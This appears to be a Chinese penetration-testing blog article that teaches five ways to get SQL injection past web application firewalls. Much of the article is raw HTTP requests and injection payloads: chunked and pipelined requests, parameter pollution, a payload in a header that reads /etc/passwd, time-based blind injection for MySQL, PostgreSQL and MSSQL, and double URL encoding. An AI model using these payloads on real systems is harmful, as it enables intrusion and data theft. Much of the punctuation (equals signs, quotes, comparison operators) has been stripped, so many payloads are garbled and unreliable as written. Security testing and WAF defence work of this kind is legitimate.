突破WAF防护的五个非常规渗透测试技巧在当今的Web安全防护体系中Web应用防火墙(WAF)已成为抵御攻击的第一道防线。大多数安全研究人员都熟悉基础的WAF绕过技术如编码转换或大小写变异但这些方法在现代WAF产品中已逐渐失效。本文将揭示五种鲜为人知的绕过技巧它们从HTTP协议实现细节和应用逻辑漏洞入手为渗透测试人员提供新的突破思路。1. 利用HTTP协议特性突破边界检测1.1 分块传输编码的妙用分块传输编码(Chunked Transfer Encoding)是HTTP协议中一个常被忽视的特性它允许将消息体分割成多个块进行传输。许多WAF在处理这种编码时存在解析差异POST /vulnerable.php HTTP/1.1 Host: target.com Transfer-Encoding: chunked 7 id1 3 and 5 11-- 0注意最后一个块必须以0结尾且每个块大小需与实际数据长度严格匹配这种技术之所以有效是因为部分WAF会重组整个请求体进行检测而后端服务器可能按块处理数据。我曾在一个金融系统测试中发现使用分块传输可以完全绕过其签名验证机制。1.2 HTTP管道化攻击HTTP管道化(HTTP Pipelining)允许客户端在单个TCP连接上发送多个请求而不必等待响应。某些WAF实现会错误地只检测第一个请求GET /normal_page.html HTTP/1.1 Host: target.com GET /vulnerable.php?id1and(select 1 from(select sleep(5))a)-- HTTP/1.1 Host: target.com Connection: keep-alive关键点在于必须保持TCP连接不中断第二个请求的路径应指向实际攻击目标Connection头需设置为keep-alive2. 应用层参数处理的盲区2.1 参数污染的多重奏效当同一参数多次出现时不同组件可能选择不同值进行处理。这种特性可构造精妙的绕过攻击参数位置WAF处理后端处理效果?id1id1--取第一个值取最后一个值绕过?id1--id1检测到攻击使用安全值被拦截?a[id]1a[id]1--数组首元素数组末元素绕过在一次电商平台测试中通过组合URL参数和POST body中的同名参数成功绕过了价值数百万美元的WAF设备。2.2 非常规内容类型的突破大多数WAF默认只处理application/x-www-form-urlencoded类型尝试以下变体可能有意外收获POST /api/user HTTP/1.1 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; nameid 1 union select 1,2,3-- ------WebKitFormBoundaryABC123--3. 协议边缘案例的利用3.1 HTTP方法混淆技术除了GET/POSTHTTP协议还定义了数十种方法部分WAF对这些非常规方法的检测存在疏漏DEBUG /vulnerable.php?id1anda:sleep(5) HTTP/1.1 Host: target.com可尝试的方法包括DEBUGTRACETRACKPATCH自定义方法名3.2 标头注入与参数隐藏将攻击载荷分散到非常规位置往往能避开检测GET /normal_page.js HTTP/1.1 Host: target.com X-Forwarded-Host: union select 1,load_file(/etc/passwd),3-- Referer: https://attacker.com/or 11--4. 时间差攻击的进阶应用4.1 非常规延时函数组合当sleep()被过滤时尝试这些替代方案/* MySQL */ ?id1and(select count(*) from information_schema.columns A,information_schema.columns B,information_schema.columns C) and 11 /* PostgreSQL */ ?id1and(select case when 11 then pg_sleep(5) else 0 end) and 11 /* MSSQL */ ?id1waitfor delay 0:0:5--4.2 基于响应的时序攻击通过精心构造的查询控制响应时间差异?id1and(select if(ascii(substr(user(),1,1))100,sleep(5),0)) and 11这种方法在REST API测试中特别有效因为时间差异往往比页面内容变化更难以被WAF检测。5. 协议解析差异的深度利用5.1 边界条件与长度限制许多WAF对超长参数或特殊边界条件处理不当GET /vulnerable.php?id1and 11--paddingAAAA...[10,000个A]...AAA HTTP/1.1关键技巧超出WAF解析缓冲区大小触发后端服务器的不同解析逻辑利用参数截断特性5.2 编码嵌套与特殊字符多层编码组合可能造成WAF检测失效原始 union select 1,2,3-- 一次编码 %27%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2d%2d 二次编码 %25%32%37%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33%32%25%32%63%25%33%33%25%32%64%25%32%64在实际测试中我发现结合UTF-7编码和HTML实体编码可以绕过某些云WAF的多层检测机制。
